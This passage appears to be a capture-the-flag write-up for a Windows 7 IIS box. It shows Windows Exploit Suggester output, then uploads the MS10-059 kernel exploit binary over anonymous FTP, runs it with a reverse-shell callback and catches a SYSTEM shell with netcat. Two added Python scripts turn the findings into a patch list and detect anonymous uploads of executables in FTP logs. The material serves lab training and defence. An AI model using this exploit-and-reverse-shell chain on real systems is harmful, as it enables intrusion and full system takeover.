nv_agp       NVIDIA nForce AGP Bus  Kernel        14/7/2009 2:25:50
ohci1394     1394 OHCI Compliant Ho Kernel        14/7/2009 2:51:29
Parport      Parallel port driver   Kernel        14/7/2009 2:45:34
partmgr      Partition Manager      Kernel        14/7/2009 2:11:35
Parvdm       Parvdm                 Kernel        14/7/2009 2:45:29
pci          PCI Bus Driver         Kernel        14/7/2009 2:11:16
pciide       pciide                 Kernel        14/7/2009 2:11:19
pcmcia       pcmcia                 Kernel        14/7/2009 2:19:29
pcw          Performance Counters f Kernel        14/7/2009 2:11:10
PEAUTH       PEAUTH                 Kernel        14/7/2009 3:35:44
PptpMiniport WAN Miniport (PPTP)    Kernel        14/7/2009 2:54:47
Processor    Processor Driver       Kernel        14/7/2009 2:11:03
Psched       QoS Packet Scheduler   Kernel        14/7/2009 2:53:58
pvscsi       pvscsi Storage Control Kernel        26/1/2016 1:15:17
ql2300       ql2300                 Kernel        23/1/2009 1:28:52
ql40xx       ql40xx                 Kernel        19/5/2009 4:17:31
RasAcd       Remote Access Auto Con Kernel        14/7/2009 2:54:40
RasAgileVpn  WAN Miniport (IKEv2)   Kernel        14/7/2009 2:55:00
Rasl2tp      WAN Miniport (L2TP)    Kernel        14/7/2009 2:54:33
RasPppoe     Remote Access PPPOE Dr Kernel        14/7/2009 2:54:53
RasSstp      WAN Miniport (SSTP)    Kernel        14/7/2009 2:54:57
rdbss        Redirected Buffering S File System   14/7/2009 2:14:26
rdpbus       Remote Desktop Device  Kernel        14/7/2009 3:02:40
RDPCDD       RDPCDD                 Kernel        14/7/2009 3:01:40
RDPDR        Terminal Server Device Kernel        14/7/2009 3:02:56
RDPENCDD     RDP Encoder Mirror Dri Kernel        14/7/2009 3:01:39
RDPREFMP     Reflector Display Driv Kernel        14/7/2009 3:01:41
RDPWD        RDP Winstation Driver  Kernel        14/7/2009 3:01:50
rdyboost     ReadyBoost             Kernel        14/7/2009 2:22:02
rspndr       Link-Layer Topology Di Kernel        14/7/2009 2:53:20
s3cap        s3cap                  Kernel        14/7/2009 2:28:46
sbp2port     sbp2port               Kernel        14/7/2009 2:11:28
scfilter     Smart card PnP Class F Kernel        14/7/2009 2:33:50
Serenum      Serenum Filter Driver  Kernel        14/7/2009 2:45:27
Serial       Serial Port Driver     Kernel        14/7/2009 2:45:33
sermouse     Serial Mouse Driver    Kernel        14/7/2009 2:45:08
sffdisk      SFF Storage Class Driv Kernel        14/7/2009 2:45:52
sffp_mmc     SFF Storage Protocol D Kernel        14/7/2009 2:45:52
sffp_sd      SFF Storage Protocol D Kernel        14/7/2009 2:45:51
sfloppy      High-Capacity Floppy D Kernel        14/7/2009 2:45:52
sisagp       SIS AGP Bus Filter     Kernel        14/7/2009 2:25:35
SiSRaid2     SiSRaid2               Kernel        24/9/2008 9:19:45
SiSRaid4     SiSRaid4               Kernel        2/10/2008 12:52:22
Smb          Message-oriented TCP/I Kernel        14/7/2009 2:53:39
spldr        Security Processor Loa Kernel        11/5/2009 7:13:47
srv          Server SMB 1.xxx Drive File System   14/7/2009 2:15:10
srv2         Server SMB 2.xxx Drive File System   14/7/2009 2:14:52
srvnet       srvnet                 File System   14/7/2009 2:14:45
stexstor     stexstor               Kernel        18/2/2009 1:03:21
storflt      Disk Virtual Machine B Kernel        14/7/2009 2:28:44
storvsc      storvsc                Kernel        14/7/2009 2:28:44
swenum       Software Bus Driver    Kernel        14/7/2009 2:45:08
Tcpip        TCP/IP Protocol Driver Kernel        14/7/2009 2:13:18
TCPIP6       Microsoft IPv6 Protoco Kernel        14/7/2009 2:13:18
tcpipreg     TCP/IP Registry Compat Kernel        14/7/2009 2:54:14
TDPIPE       TDPIPE                 Kernel        14/7/2009 3:01:36
TDTCP        TDTCP                  Kernel        14/7/2009 3:01:37
tdx          NetIO Legacy TDI Suppo Kernel        14/7/2009 2:12:10
TermDD       Terminal Device Driver Kernel        14/7/2009 3:01:35
tssecsrv     Remote Desktop Service Kernel        14/7/2009 3:01:50
tunnel       Microsoft Tunnel Minip Kernel        14/7/2009 2:54:03
uagp35       Microsoft AGPv3.5 Filt Kernel        14/7/2009 2:25:40
udfs         udfs                   File System   14/7/2009 2:14:09
uliagpkx     Uli AGP Bus Filter     Kernel        14/7/2009 2:25:47
umbus        UMBus Enumerator Drive Kernel        14/7/2009 2:51:38
UmPass       Microsoft UMPass Drive Kernel        14/7/2009 2:51:35
usbccgp      Microsoft USB Generic  Kernel        14/7/2009 2:51:31
usbcir       eHome Infrared Receive Kernel        14/7/2009 2:51:18
usbehci      Microsoft USB 2.0 Enha Kernel        14/7/2009 2:51:14
usbhub       Microsoft USB Standard Kernel        14/7/2009 2:52:06
usbohci      Microsoft USB Open Hos Kernel        14/7/2009 2:51:14
usbprint     Microsoft USB PRINTER  Kernel        14/7/2009 3:17:06
USBSTOR      USB Mass Storage Drive Kernel        14/7/2009 2:51:19
usbuhci      Microsoft USB Universa Kernel        14/7/2009 2:51:10
vdrvroot     Microsoft Virtual Driv Kernel        14/7/2009 2:46:19
vga          vga                    Kernel        14/7/2009 2:25:49
VgaSave      VgaSave                Kernel        14/7/2009 2:25:50
vhdmp        vhdmp                  Kernel        14/7/2009 2:46:25
viaagp       VIA AGP Bus Filter     Kernel        14/7/2009 2:25:39
ViaC7        VIA C7 Processor Drive Kernel        14/7/2009 2:11:03
viaide       viaide                 Kernel        14/7/2009 2:11:20
vm3dmp       vm3dmp                 Kernel        14/12/2016 12:32:48
vmbus        Virtual Machine Bus    Kernel        14/7/2009 2:28:53
VMBusHID     VMBusHID               Kernel        14/7/2009 2:28:45
vmci         VMware VMCI Bus Driver Kernel        4/6/2016 11:06:29
VMMemCtl     Memory Control Driver  Kernel        5/3/2016 1:15:45
vmmouse      VMware Pointing Device Kernel        20/2/2016 1:14:08
volmgr       Volume Manager Driver  Kernel        14/7/2009 2:11:25
volmgrx      Dynamic Volume Manager Kernel        14/7/2009 2:11:41
volsnap      Storage volumes        Kernel        14/7/2009 2:11:34
vsmraid      vsmraid                Kernel        31/1/2009 3:13:29
vsock        vSockets Virtual Machi Kernel        22/6/2016 11:07:52
vwifibus     Virtual WiFi Bus Drive Kernel        14/7/2009 2:52:02
WacomPen     Wacom Serial Pen HID D Kernel        14/7/2009 2:46:53
WANARP       Remote Access IP ARP D Kernel        14/7/2009 2:55:02
Wanarpv6     Remote Access IPv6 ARP Kernel        14/7/2009 2:55:02
Wd           Wd                     Kernel        14/7/2009 2:11:31
Wdf01000     Kernel Mode Driver Fra Kernel        14/7/2009 2:11:36
WfpLwf       WFP Lightweight Filter Kernel        14/7/2009 2:53:51
WIMMount     WIMMount               File System   14/7/2009 2:17:57
WmiAcpi      Microsoft Windows Mana Kernel        14/7/2009 2:19:16
ws2ifsl      Windows Socket 2.0 Non Kernel        14/7/2009 2:55:01
WudfPf       User Mode Driver Frame Kernel        14/7/2009 2:50:13

c:\windows\system32\inetsrv>

Exploit Suggester

Devel Machine

C:> systeminfo > systeminfo.txt

Kalibox

#  ./windows-exploit-suggester.py --database 2019-09-10-mssb.xls --systeminfo systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 32-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
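
Every bulletin the suggester prints is an update missing from the host, so the output above doubles as a patch list. The Python script below is an added example, not part of the original write-up or of windows-exploit-suggester: it parses that output format and groups the missing KBs by impact. The function names are hypothetical and the sample lines are copied from the output above.

```python
import re
from collections import defaultdict

# Lines copied from the suggester output above (list shortened).
SAMPLE = """\
[*]
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[*] done
"""

# Legend from the tool: [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
BULLETIN = re.compile(r"^\[(?P<tag>[EM*])\] (?P<bulletin>MS\d{2}-\d{3}): "
                      r"(?P<title>.+) \((?P<kb>\d+)\) - (?P<severity>\w+)$")
REFERENCE = re.compile(r"^\[\*\]\s+(?P<url>https?://\S+)")
IMPACTS = {"Elevation of Privilege": "EoP", "Remote Code Execution": "RCE"}

def impact_of(title):
    """Classify a bulletin by the impact phrase in its title."""
    for phrase, label in IMPACTS.items():
        if phrase in title:
            return label
    return "other"          # e.g. cumulative Internet Explorer updates

def parse(text):
    """Return one dict per missing bulletin, with its reference URLs attached."""
    findings = []
    for line in text.splitlines():
        m = BULLETIN.match(line.rstrip())
        if m:
            findings.append({**m.groupdict(), "refs": [],
                             "impact": impact_of(m["title"])})
            continue
        r = REFERENCE.match(line)
        if r and findings:  # a URL line belongs to the bulletin printed above it
            findings[-1]["refs"].append(r["url"])
    return findings

def missing_by_impact(findings):
    """Group (bulletin, KB) pairs by impact: the patch list for the host."""
    groups = defaultdict(list)
    for f in findings:
        groups[f["impact"]].append((f["bulletin"], "KB" + f["kb"]))
    return dict(groups)

if __name__ == "__main__":
    for impact, items in missing_by_impact(parse(SAMPLE)).items():
        print(impact, items)
```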

Working Exploit

MS10-059 worked and I got the binary from https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe.

On Kalibox

ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: <password>
230 User logged in.
Remote system type is Windows_NT.
ftp> put  MS10-059.exe

Devel Machine

c:\inetpub\wwwroot>MS10-059.exe
MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
c:\inetpub\wwwroot>MS10-059.exe YOUR-IP 4444
MS10-059.exe YOUR-IP 4444

On Kalibox

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [YOUR-IP] from (UNKNOWN) [10.10.10.5] 49160
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\inetpub\wwwroot>whoami
whoami
nt authority\system
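
The upload step above works because the anonymous FTP root is also the IIS web root, so anything written over FTP lands in c:\inetpub\wwwroot. As an added example (not from the original write-up), this Python check flags completed anonymous uploads of executable or server-side script files in a W3C-format FTP log; the log lines are constructed and the field selection in the `#Fields:` header is an assumption.

```python
import os

# Constructed sample log: timestamps, users and the field selection are
# illustrative; file names and the client address are taken from the write-up.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2019-09-10 14:20:01 10.10.14.10 - USER anonymous 331
2019-09-10 14:20:02 10.10.14.10 anonymous PASS *** 230
2019-09-10 14:20:09 10.10.14.10 anonymous STOR revshell.aspx 226
2019-09-10 14:21:15 10.10.14.10 anonymous RETR welcome.png 226
2019-09-10 14:41:30 10.10.14.10 anonymous STOR MS10-059.exe 226
2019-09-10 14:45:00 10.10.14.10 anonymous STOR notes.txt 226
2019-09-10 14:46:00 192.0.2.7 webadmin STOR default.aspx 226
"""

# Extensions IIS would execute, load, or treat as configuration.
RISKY_EXT = {".asp", ".aspx", ".ashx", ".asmx", ".exe", ".dll", ".config"}

def parse_w3c(text):
    """Yield one dict per entry, keyed by the most recent #Fields: directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):   # skip truncated or malformed rows
                yield dict(zip(fields, values))

def anonymous_code_uploads(text):
    """Completed (226) anonymous STORs of files the web server could run."""
    hits = []
    for e in parse_w3c(text):
        ext = os.path.splitext(e.get("cs-uri-stem", ""))[1].lower()
        if (e.get("cs-method", "").upper() == "STOR"
                and e.get("sc-status") == "226"
                and e.get("cs-username", "").lower() == "anonymous"
                and ext in RISKY_EXT):
            hits.append((e["date"] + " " + e["time"], e["c-ip"], e["cs-uri-stem"]))
    return hits

if __name__ == "__main__":
    for when, client, name in anonymous_code_uploads(SAMPLE_LOG):
        print(when, client, name)
```

The alert is a stopgap: the underlying fix is to remove anonymous write access or to move the FTP root out of the web root.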

